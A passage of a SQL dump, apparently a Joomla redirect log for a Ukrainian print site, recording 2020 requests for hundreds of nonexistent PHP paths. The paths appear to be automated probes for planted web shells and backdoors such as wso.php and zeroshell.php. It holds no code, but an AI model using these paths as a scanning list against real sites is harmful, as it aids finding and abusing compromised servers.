03:51:30','0000-00-00 00:00:00',301),(17223,'https://ekvatorprint.com.ua/public/hebadge_pagebadge/00/.h..php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 03:52:40','0000-00-00 00:00:00',301),(17224,'https://ekvatorprint.com.ua/webmap.php',NULL,'http://site.ru','',4,0,'2020-06-29 03:55:08','0000-00-00 00:00:00',301),(17225,'https://ekvatorprint.com.ua/greens.php',NULL,'http://site.ru','',5,0,'2020-06-29 04:06:17','0000-00-00 00:00:00',301),(17226,'https://ekvatorprint.com.ua/plugins1/system/legacy/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:11:27','0000-00-00 00:00:00',301),(17227,'https://ekvatorprint.com.ua/administrator/modules/mod_multilangstatus/language/en-gb/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:13:52','0000-00-00 00:00:00',301),(17228,'https://ekvatorprint.com.ua/templates/atomic/css/templatew.php',NULL,'http://site.ru','',2,0,'2020-06-29 04:36:01','0000-00-00 00:00:00',301),(17229,'https://ekvatorprint.com.ua/templates/beez3/html/com_contact/categories/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:40:24','0000-00-00 00:00:00',301),(17230,'https://ekvatorprint.com.ua/administrator/components/com_admin/helpers/html/images.php',NULL,'http://site.ru','',2,0,'2020-06-29 04:44:18','0000-00-00 00:00:00',301),(17231,'https://ekvatorprint.com.ua/plugins/system/jsnframework/libraries/joomlashine/upgrade/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:46:02','0000-00-00 00:00:00',301),(17232,'https://ekvatorprint.com.ua/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/tabletools/dialogs/ix.php.php',NULL,'http://site.ru','',2,0,'2020-06-29 05:10:07','0000-00-00 00:00:00',301),(17233,'https://ekvatorprint.com.ua/t9lbiw.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:10:15','0000-00-00 00:00:00',301),(17234,'https://ekvatorprint.com.ua/administrator/components/com_admin/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:10:46','0000-00-00 00:00:00',301),(17235,'https://ekvatorprint.com.ua/bin/wp-log.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:11:41','0000-00-00 00:00:00',301),(17236,'https://ekvatorprint.com.ua/as.php',NULL,'http://site.ru','',3,0,'2020-06-29 05:31:10','0000-00-00 00:00:00',301),(17237,'https://ekvatorprint.com.ua/templates/beez3/html/com_newsfeeds/category/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:32:20','0000-00-00 00:00:00',301),(17238,'https://ekvatorprint.com.ua/plugins/system/system.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:35:38','0000-00-00 00:00:00',301),(17239,'https://ekvatorprint.com.ua/administrator/templates/bluestork/css/theme.php',NULL,'http://site.ru','',1,0,'2020-06-29 06:02:41','0000-00-00 00:00:00',301),(17240,'https://ekvatorprint.com.ua/administrator/components/com_modules/views/preview/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 06:05:37','0000-00-00 00:00:00',301),(17241,'https://ekvatorprint.com.ua/style_.php',NULL,'http://site.ru','',1,0,'2020-06-29 06:06:25','0000-00-00 00:00:00',301),(17242,'https://ekvatorprint.com.ua/templates/ambient/cache/beautifu.php',NULL,'http://site.ru','',1,0,'2020-06-29 06:10:59','0000-00-00 00:00:00',301),(17243,'https://ekvatorprint.com.ua/buptmcrups.php',NULL,'http://site.ru','',1,0,'2020-06-29 06:32:54','0000-00-00 00:00:00',301),(17244,'https://ekvatorprint.com.ua/components/com_content/views/archive/towerin.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:27:07','0000-00-00 00:00:00',301),(17245,'https://ekvatorprint.com.ua/administrator/components/com_admin/gank.php.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-29 07:28:35','0000-00-00 00:00:00',301),(17246,'https://ekvatorprint.com.ua/templates/ambient/images/vertex/responsive/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-29 07:29:21','0000-00-00 00:00:00',301),(17247,'https://ekvatorprint.com.ua/administrator/components/com_banners/helpers/html/ycirqz.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:29:56','0000-00-00 00:00:00',301),(17248,'https://ekvatorprint.com.ua/cache/ghjk.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 07:33:27','0000-00-00 00:00:00',301),(17249,'https://ekvatorprint.com.ua/cache/zeroshell.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:34:03','0000-00-00 00:00:00',301),(17250,'https://ekvatorprint.com.ua/zzz.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:44:51','0000-00-00 00:00:00',301),(17251,'https://ekvatorprint.com.ua/administrator/components/com_djimageslider/views/item/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:56:33','0000-00-00 00:00:00',301),(17252,'https://ekvatorprint.com.ua/components/com_contact/views/featured/tmpl/.hello.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:59:07','0000-00-00 00:00:00',301),(17253,'https://ekvatorprint.com.ua/components/com_jce/editor/libraries/css/jquery/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 08:25:26','0000-00-00 00:00:00',301),(17254,'https://ekvatorprint.com.ua/images/eventgallery/licensed.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:27:14','0000-00-00 00:00:00',301),(17255,'https://ekvatorprint.com.ua/images/wp-muen.php',NULL,'http://site.ru','',2,0,'2020-06-29 08:55:47','0000-00-00 00:00:00',301),(17256,'https://ekvatorprint.com.ua/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/clipboard/dialogs/gank.php.php',NULL,'http://site.ru','',3,0,'2020-06-29 09:28:45','0000-00-00 00:00:00',301),(17257,'https://ekvatorprint.com.ua/administrator/components/com_akeeba/akeeba/platform/joomla25/filters/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-29 09:29:07','0000-00-00 00:00:00',301),(17258,'https://ekvatorprint.com.ua/templates/beez/javascript/tools.php',NULL,'http://site.ru','',2,0,'2020-06-29 09:30:13','0000-00-00 00:00:00',301),(17259,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/upload/css/streamed.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 09:45:18','0000-00-00 00:00:00',301),(17260,'https://ekvatorprint.com.ua/xx.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 09:47:12','0000-00-00 00:00:00',301),(17261,'https://ekvatorprint.com.ua/pressthis/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 09:54:27','0000-00-00 00:00:00',301),(17262,'https://ekvatorprint.com.ua/administrator/templates/bluestork/css/theme.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 09:55:17','0000-00-00 00:00:00',301),(17263,'https://ekvatorprint.com.ua/a89.php',NULL,'http://site.ru','',1,0,'2020-06-29 10:25:42','0000-00-00 00:00:00',301),(17264,'https://ekvatorprint.com.ua/cache/read.php',NULL,'http://site.ru','',1,0,'2020-06-29 10:29:32','0000-00-00 00:00:00',301),(17265,'https://ekvatorprint.com.ua/urbanconcept.rw/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-06-29 11:01:17','0000-00-00 00:00:00',301),(17266,'https://ekvatorprint.com.ua/administrator/components/com_admin/models/forms/.h..php',NULL,'http://site.ru','',1,0,'2020-06-29 11:13:21','0000-00-00 00:00:00',301),(17267,'https://ekvatorprint.com.ua/pressthis/popup-pomo.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 12:12:12','0000-00-00 00:00:00',301),(17268,'https://ekvatorprint.com.ua/images/articles/cc.php',NULL,'http://site.ru','',1,0,'2020-06-29 12:13:09','0000-00-00 00:00:00',301),(17269,'https://ekvatorprint.com.ua/components/com_search/models/sad.php',NULL,'http://site.ru','',5,0,'2020-06-29 12:13:32','0000-00-00 00:00:00',301),(17270,'https://ekvatorprint.com.ua/images/galerie-video/theme.php',NULL,'http://site.ru','',1,0,'2020-06-29 12:15:07','0000-00-00 00:00:00',301),(17271,'https://ekvatorprint.com.ua/gallery/large/meuhy.php',NULL,'http://site.ru','',2,0,'2020-06-29 13:35:38','0000-00-00 00:00:00',301),(17272,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 13:35:45','0000-00-00 00:00:00',301),(17273,'https://ekvatorprint.com.ua/components/com_content/models/green.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 13:41:33','0000-00-00 00:00:00',301),(17274,'https://ekvatorprint.com.ua/components/com_foxcontact/ox.php',NULL,'http://site.ru','',1,0,'2020-06-29 13:42:12','0000-00-00 00:00:00',301),(17275,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/profile/ob.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:07:16','0000-00-00 00:00:00',301),(17276,'https://ekvatorprint.com.ua/images/wp-te.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:13:31','0000-00-00 00:00:00',301),(17277,'https://ekvatorprint.com.ua/administrator/components/com_admintools/liveupdate/language/ru-ru/io.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:38:06','0000-00-00 00:00:00',301),(17278,'https://ekvatorprint.com.ua/libraries/f0f/integration/joomla/wp-blog.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:59:33','0000-00-00 00:00:00',301),(17279,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/print/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:05:26','0000-00-00 00:00:00',301),(17280,'https://ekvatorprint.com.ua/administrator/components/com_contact/pp1.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:06:26','0000-00-00 00:00:00',301),(17281,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/others/mysql/ex_liner.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:06:27','0000-00-00 00:00:00',301),(17282,'https://ekvatorprint.com.ua/components/com_foxcontact/b0x.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 15:08:05','0000-00-00 00:00:00',301),(17283,'https://ekvatorprint.com.ua/administrator/components/com_associations/layouts/joomla/simple.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 15:29:02','0000-00-00 00:00:00',301),(17284,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:30:41','0000-00-00 00:00:00',301),(17285,'https://ekvatorprint.com.ua/components/com_finder/helpers/data.php',NULL,'http://site.ru','',2,0,'2020-06-29 15:35:39','0000-00-00 00:00:00',301),(17286,'https://ekvatorprint.com.ua/images/articles/jmp2015/theme.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:39:30','0000-00-00 00:00:00',301),(17287,'https://ekvatorprint.com.ua/administrator/components/com_content/helpers/html/5e43c79823350.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 16:02:42','0000-00-00 00:00:00',301),(17288,'https://ekvatorprint.com.ua/images/log.php',NULL,'http://site.ru','',4,0,'2020-06-29 16:10:26','0000-00-00 00:00:00',301),(17289,'https://ekvatorprint.com.ua/administrator/components/com_languages/views/overrides/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 16:11:47','0000-00-00 00:00:00',301),(17290,'https://ekvatorprint.com.ua/components/com_contenthistory/wrapper.php',NULL,'http://site.ru','',1,0,'2020-06-29 16:30:02','0000-00-00 00:00:00',301),(17291,'https://ekvatorprint.com.ua/homefeatured/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 17:04:04','0000-00-00 00:00:00',301),(17292,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/views/phocagallerym/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 17:27:11','0000-00-00 00:00:00',301),(17293,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/views/phocagallerycs/tmpl/admin.php',NULL,'http://site.ru','',3,0,'2020-06-29 17:36:47','0000-00-00 00:00:00',301),(17294,'https://ekvatorprint.com.ua/cache/zr.php',NULL,'http://site.ru','',3,0,'2020-06-29 18:02:00','0000-00-00 00:00:00',301),(17295,'https://ekvatorprint.com.ua/cli/vpl20xjb.php',NULL,'http://site.ru','',1,0,'2020-06-29 18:20:34','0000-00-00 00:00:00',301),(17296,'https://ekvatorprint.com.ua/iaqoja.php',NULL,'http://site.ru','',1,0,'2020-06-29 18:24:36','0000-00-00 00:00:00',301),(17297,'https://ekvatorprint.com.ua/administrator/manifests/files/akeebastrapper/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 18:43:49','0000-00-00 00:00:00',301),(17298,'https://ekvatorprint.com.ua/cache/wp-site.php',NULL,'http://site.ru','',3,0,'2020-06-29 18:54:50','0000-00-00 00:00:00',301),(17299,'https://ekvatorprint.com.ua/administrator/components/com_associations/feal.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 19:22:53','0000-00-00 00:00:00',301),(17300,'https://ekvatorprint.com.ua/.wp-load/content-post.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 19:24:40','0000-00-00 00:00:00',301),(17301,'https://ekvatorprint.com.ua/images/errors.php',NULL,'http://site.ru','',1,0,'2020-06-29 19:46:27','0000-00-00 00:00:00',301),(17302,'https://ekvatorprint.com.ua/fhbvqppxkk.php',NULL,'http://site.ru','',2,0,'2020-06-29 20:11:41','0000-00-00 00:00:00',301),(17303,'https://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/xyxz.php',NULL,'http://site.ru','',2,0,'2020-06-29 20:16:27','0000-00-00 00:00:00',301),(17304,'https://ekvatorprint.com.ua/cache/root.php',NULL,'http://site.ru','',1,0,'2020-06-29 20:17:05','0000-00-00 00:00:00',301),(17305,'https://ekvatorprint.com.ua/components/com_foxcontact/css/images.php',NULL,'http://site.ru','',1,0,'2020-06-29 20:20:36','0000-00-00 00:00:00',301),(17306,'https://ekvatorprint.com.ua/images/files/licensed.php',NULL,'http://site.ru','',1,0,'2020-06-29 20:52:33','0000-00-00 00:00:00',301),(17307,'https://ekvatorprint.com.ua/plugins/twofactorauth/bag.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 20:55:23','0000-00-00 00:00:00',301),(17308,'https://ekvatorprint.com.ua/yedek/404.php',NULL,'http://site.ru','',4,0,'2020-06-29 21:10:35','0000-00-00 00:00:00',301),(17309,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/views/articles/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 21:14:27','0000-00-00 00:00:00',301),(17310,'https://ekvatorprint.com.ua/administrator/components/com_admin/media-admin.php',NULL,'http://site.ru','',1,0,'2020-06-30 01:35:10','0000-00-00 00:00:00',301),(17311,'https://ekvatorprint.com.ua/ghjk.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 01:46:56','0000-00-00 00:00:00',301),(17312,'https://ekvatorprint.com.ua/wp-item.php',NULL,'http://site.ru','',1,0,'2020-06-30 01:57:12','0000-00-00 00:00:00',301),(17313,'https://ekvatorprint.com.ua/images/ws0.php',NULL,'http://site.ru','',1,0,'2020-06-30 02:29:01','0000-00-00 00:00:00',301),(17314,'https://ekvatorprint.com.ua/components/com_easyblog/views/blogger/tmpl/wp-block.php',NULL,'http://site.ru','',2,0,'2020-06-30 02:31:57','0000-00-00 00:00:00',301),(17315,'https://ekvatorprint.com.ua/components/com_newsfeeds/helpers/wp-table.php',NULL,'http://site.ru','',2,0,'2020-06-30 02:58:30','0000-00-00 00:00:00',301),(17316,'https://ekvatorprint.com.ua/components/com_layer_slider/base/static/layerslider/plugins/wp-update.php',NULL,'http://site.ru','',1,0,'2020-06-30 03:02:50','0000-00-00 00:00:00',301),(17317,'https://ekvatorprint.com.ua/images/tes.php.pjpeg',NULL,'http://site.ru','',1,0,'2020-06-30 03:04:28','0000-00-00 00:00:00',301),(17318,'https://ekvatorprint.com.ua/images/eventlist/theme.php',NULL,'http://site.ru','',3,0,'2020-06-30 03:24:36','0000-00-00 00:00:00',301),(17319,'https://ekvatorprint.com.ua/images/k.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 03:32:55','0000-00-00 00:00:00',301),(17320,'https://ekvatorprint.com.ua/spam/wp-cons.php',NULL,'http://site.ru','',1,0,'2020-06-30 03:33:47','0000-00-00 00:00:00',301),(17321,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/tabfocus/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-30 03:55:14','0000-00-00 00:00:00',301),(17322,'https://ekvatorprint.com.ua/images/stories/rokstories/kbjkjm.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 03:58:52','0000-00-00 00:00:00',301),(17323,'https://ekvatorprint.com.ua/components/com_fileman/template/menus.php',NULL,'http://site.ru','',1,0,'2020-06-30 04:49:10','0000-00-00 00:00:00',301),(17324,'https://ekvatorprint.com.ua/images/phocagallery/bilder/settings.php',NULL,'http://site.ru','',2,0,'2020-06-30 05:22:14','0000-00-00 00:00:00',301),(17325,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/profile/wp-side.php',NULL,'http://site.ru','',2,0,'2020-06-30 05:22:35','0000-00-00 00:00:00',301),(17326,'https://ekvatorprint.com.ua/components/com_wrapper/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-30 05:22:55','0000-00-00 00:00:00',301),(17327,'https://ekvatorprint.com.ua/images/eventlist/images.php',NULL,'http://site.ru','',2,0,'2020-06-30 06:11:34','0000-00-00 00:00:00',301),(17328,'https://ekvatorprint.com.ua/wp-console.php.suspected',NULL,'http://site.ru','',5,0,'2020-06-30 06:37:17','0000-00-00 00:00:00',301),(17329,'https://ekvatorprint.com.ua/revisiona/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-06-30 07:01:58','0000-00-00 00:00:00',301),(17330,'https://ekvatorprint.com.ua/homefeatured/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-30 07:07:33','0000-00-00 00:00:00',301),(17331,'https://ekvatorprint.com.ua/assets/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-30 07:34:10','0000-00-00 00:00:00',301),(17332,'https://ekvatorprint.com.ua/gallery.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 08:18:50','0000-00-00 00:00:00',301),(17333,'https://ekvatorprint.com.ua/cache/widgetkit/data.php',NULL,'http://site.ru','',1,0,'2020-06-30 08:28:23','0000-00-00 00:00:00',301),(17334,'https://ekvatorprint.com.ua/blog/xml.php',NULL,'http://site.ru','',4,0,'2020-06-30 08:48:48','0000-00-00 00:00:00',301),(17335,'https://ekvatorprint.com.ua/bin/incengine42.php',NULL,'http://site.ru','',3,0,'2020-06-30 08:51:01','0000-00-00 00:00:00',301),(17336,'https://ekvatorprint.com.ua/components/com_taskmanager/wp-side.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 08:54:03','0000-00-00 00:00:00',301),(17337,'https://ekvatorprint.com.ua/administrator/templates/hathor/html/com_languages/installed/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-30 09:00:18','0000-00-00 00:00:00',301),(17338,'https://ekvatorprint.com.ua/templates/beez3/a17.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:13:08','0000-00-00 00:00:00',301),(17339,'https://ekvatorprint.com.ua/plugins/jsnimageshow/themeclassic/assets/js/galleria/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:15:55','0000-00-00 00:00:00',301),(17340,'https://ekvatorprint.com.ua/images/faculty/licensed.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:18:08','0000-00-00 00:00:00',301),(17341,'https://ekvatorprint.com.ua/components/com_docman/views/tree/config.php',NULL,'http://site.ru','',2,0,'2020-06-30 09:40:07','0000-00-00 00:00:00',301),(17342,'https://ekvatorprint.com.ua/plugins1/editors/tinymce/jscripts/tiny_mce/themes/advanced/.h..php',NULL,'http://site.ru','',2,0,'2020-06-30 09:43:46','0000-00-00 00:00:00',301),(17343,'https://ekvatorprint.com.ua/components/error.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:51:09','0000-00-00 00:00:00',301),(17344,'https://ekvatorprint.com.ua/cache/zz.php',NULL,'http://site.ru','',1,0,'2020-06-30 10:06:07','0000-00-00 00:00:00',301),(17345,'https://ekvatorprint.com.ua/csv/cez.php',NULL,'http://site.ru','',2,0,'2020-06-30 10:09:14','0000-00-00 00:00:00',301),(17346,'https://ekvatorprint.com.ua/components/com_search/models/tools.php',NULL,'http://site.ru','',1,0,'2020-06-30 10:36:02','0000-00-00 00:00:00',301),(17347,'https://ekvatorprint.com.ua/administrator/modules/mod_toolbar/wp-console.php',NULL,'http://site.ru','',1,0,'2020-06-30 11:00:52','0000-00-00 00:00:00',301),(17348,'https://ekvatorprint.com.ua/administrator/components/com_content/views/article/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 11:01:59','0000-00-00 00:00:00',301),(17349,'https://ekvatorprint.com.ua/general/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-30 11:08:23','0000-00-00 00:00:00',301),(17350,'https://ekvatorprint.com.ua/components/com_content/views/archive/ajkershell.php',NULL,'http://site.ru','',3,0,'2020-06-30 11:13:38','0000-00-00 00:00:00',301),(17351,'https://ekvatorprint.com.ua/wp-cons.php',NULL,'http://site.ru','',2,0,'2020-06-30 11:24:57','0000-00-00 00:00:00',301),(17352,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/ob.php',NULL,'http://site.ru','',1,0,'2020-06-30 11:25:03','0000-00-00 00:00:00',301),(17353,'https://ekvatorprint.com.ua/administrator/help/en-gb/css/.h..php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 11:32:36','0000-00-00 00:00:00',301),(17354,'https://ekvatorprint.com.ua/components/com_content/views/archive/beastwso-icq-744324366.php',NULL,'http://site.ru','',1,0,'2020-06-30 12:27:25','0000-00-00 00:00:00',301),(17355,'https://ekvatorprint.com.ua/wp-function.php',NULL,'http://site.ru','',1,0,'2020-06-30 12:48:52','0000-00-00 00:00:00',301),(17356,'https://ekvatorprint.com.ua/administrator/includes/img/mode.php',NULL,'http://site.ru','',2,0,'2020-06-30 12:50:56','0000-00-00 00:00:00',301),(17357,'https://ekvatorprint.com.ua/images/ict.php',NULL,'http://site.ru','',2,0,'2020-06-30 12:54:20','0000-00-00 00:00:00',301),(17358,'https://ekvatorprint.com.ua/administrator/components/com_admin/helpers/html/images.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 13:10:32','0000-00-00 00:00:00',301),(17359,'https://ekvatorprint.com.ua/images/ateliers/atelier3/wso.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-30 13:46:37','0000-00-00 00:00:00',301),(17360,'https://ekvatorprint.com.ua/ebkzdc.php',NULL,'http://site.ru','',1,0,'2020-06-30 13:56:36','0000-00-00 00:00:00',301),(17361,'https://ekvatorprint.com.ua/images/up2.php',NULL,'http://site.ru','',1,0,'2020-06-30 14:40:06','0000-00-00 00:00:00',301),(17362,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/help/gank.php.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 15:06:44','0000-00-00 00:00:00',301),(17363,'https://ekvatorprint.com.ua/cache/wp-cofigs.php',NULL,'http://site.ru','',1,0,'2020-06-30 15:35:29','0000-00-00 00:00:00',301),(17364,'https://ekvatorprint.com.ua/coexistsu.php',NULL,'http://site.ru','',2,0,'2020-06-30 15:55:17','0000-00-00 00:00:00',301),(17365,'https://ekvatorprint.com.ua/.haccess.php',NULL,'http://site.ru','',5,0,'2020-06-30 15:59:21','0000-00-00 00:00:00',301),(17366,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/views/phocagallerycoimg/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-30 16:26:03','0000-00-00 00:00:00',301),(17367,'https://ekvatorprint.com.ua/administrator/modules/mod_multilangstatus/ngoc24ba.php',NULL,'http://site.ru','',1,0,'2020-06-30 16:29:55','0000-00-00 00:00:00',301),(17368,'https://ekvatorprint.com.ua/connect/feter.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 16:58:59','0000-00-00 00:00:00',301),(17369,'https://ekvatorprint.com.ua/images/xsec.php',NULL,'http://site.ru','',1,0,'2020-06-30 17:04:08','0000-00-00 00:00:00',301),(17370,'https://ekvatorprint.com.ua/cache/theme.php',NULL,'http://site.ru','',1,0,'2020-06-30 17:24:51','0000-00-00 00:00:00',301),(17371,'https://ekvatorprint.com.ua/images/thkbth.php',NULL,'http://site.ru','',1,0,'2020-06-30 17:27:55','0000-00-00 00:00:00',301),(17372,'https://ekvatorprint.com.ua/administrator/components/com_banners/sql/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 17:30:47','0000-00-00 00:00:00',301),(17373,'https://ekvatorprint.com.ua/images/edit_page.php',NULL,'http://site.ru','',2,0,'2020-06-30 18:17:13','0000-00-00 00:00:00',301),(17374,'https://ekvatorprint.com.ua/templates/beez3/html/com_newsfeeds/data.php',NULL,'http://site.ru','',1,0,'2020-06-30 18:21:57','0000-00-00 00:00:00',301),(17375,'https://ekvatorprint.com.ua/components/com_foxcontact/c.php',NULL,'http://site.ru','',2,0,'2020-06-30 19:13:20','0000-00-00 00:00:00',301),(17376,'https://ekvatorprint.com.ua/images/galerie-video/images.php',NULL,'http://site.ru','',1,0,'2020-06-30 19:14:48','0000-00-00 00:00:00',301),(17377,'https://ekvatorprint.com.ua/cache/newsleter.php',NULL,'http://site.ru','',1,0,'2020-06-30 19:40:00','0000-00-00 00:00:00',301),(17378,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/sqlazure/.h..php',NULL,'http://site.ru','',1,0,'2020-06-30 19:46:57','0000-00-00 00:00:00',301),(17379,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/ix.php.php',NULL,'http://site.ru','',2,0,'2020-06-30 20:07:13','0000-00-00 00:00:00',301),(17380,'https://ekvatorprint.com.ua/components/com_jooomlas/codex.php',NULL,'http://site.ru','',4,0,'2020-06-30 20:12:04','0000-00-00 00:00:00',301),(17381,'https://ekvatorprint.com.ua/administrator/components/com_banners/models/radio.php',NULL,'http://site.ru','',2,0,'2020-06-30 20:36:44','0000-00-00 00:00:00',301),(17382,'https://ekvatorprint.com.ua/cache/index1.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:07:13','0000-00-00 00:00:00',301),(17383,'https://ekvatorprint.com.ua/administrator/components/com_banners/views/tracks/tmpl/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:10:31','0000-00-00 00:00:00',301),(17384,'https://ekvatorprint.com.ua/components/com_content/.h..php.suspected',NULL,'http://site.ru','',3,0,'2020-06-30 21:10:31','0000-00-00 00:00:00',301),(17385,'https://ekvatorprint.com.ua/administrator/components/com_messages/layouts/toolbar/daemotn.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:10:52','0000-00-00 00:00:00',301),(17386,'https://ekvatorprint.com.ua/f-o.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:56:54','0000-00-00 00:00:00',301),(17387,'https://ekvatorprint.com.ua/administrator/components/com_finder/views/filter/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-30 21:58:37','0000-00-00 00:00:00',301),(17388,'https://ekvatorprint.com.ua/components/com_weblinks/models/forms/wp-table.php',NULL,'http://site.ru','',4,0,'2020-06-30 22:20:18','0000-00-00 00:00:00',301),(17389,'https://ekvatorprint.com.ua/action.php',NULL,'http://site.ru','',2,0,'2020-06-30 22:21:14','0000-00-00 00:00:00',301),(17390,'https://ekvatorprint.com.ua/assets/assetsu.php',NULL,'http://site.ru','',1,0,'2020-06-30 22:27:12','0000-00-00 00:00:00',301),(17391,'https://ekvatorprint.com.ua/cache/miniv48.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 22:53:45','0000-00-00 00:00:00',301),(17392,'https://ekvatorprint.com.ua/templates/ambient/images/multibox/streamed.php',NULL,'http://site.ru','',2,0,'2020-06-30 22:55:58','0000-00-00 00:00:00',301),(17393,'https://ekvatorprint.com.ua/fprww1.php',NULL,'http://site.ru','',1,0,'2020-06-30 23:17:36','0000-00-00 00:00:00',301),(17394,'https://ekvatorprint.com.ua/rzzmun.php',NULL,'http://site.ru','',2,0,'2020-07-01 00:43:50','0000-00-00 00:00:00',301),(17395,'https://ekvatorprint.com.ua/sandvox_greyleaf/sitemps.php',NULL,'http://site.ru','',1,0,'2020-07-01 01:32:05','0000-00-00 00:00:00',301),(17396,'https://ekvatorprint.com.ua/templates/beez3/css/theme.php',NULL,'http://site.ru','',5,0,'2020-07-01 01:37:16','0000-00-00 00:00:00',301),(17397,'https://ekvatorprint.com.ua/wp-block.php',NULL,'http://site.ru','',4,0,'2020-07-01 01:41:22','0000-00-00 00:00:00',301),(17398,'https://ekvatorprint.com.ua/v8cvoj.php',NULL,'http://site.ru','',2,0,'2020-07-01 01:56:47','0000-00-00 00:00:00',301),(17399,'https://ekvatorprint.com.ua/components/com_newsfeeds/views/miniv48.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-01 02:01:15','0000-00-00 00:00:00',301),(17400,'https://ekvatorprint.com.ua/cli/deep.php',NULL,'http://site.ru','',2,0,'2020-07-01 02:14:01','0000-00-00 00:00:00',301),(17401,'https://ekvatorprint.com.ua/.wp-blog-posts.php',NULL,'http://site.ru','',1,0,'2020-07-01 03:04:29','0000-00-00 00:00:00',301),(17402,'https://ekvatorprint.com.ua/administrator/components/com_finder/sql/languages.php',NULL,'http://site.ru','',2,0,'2020-07-01 03:32:08','0000-00-00 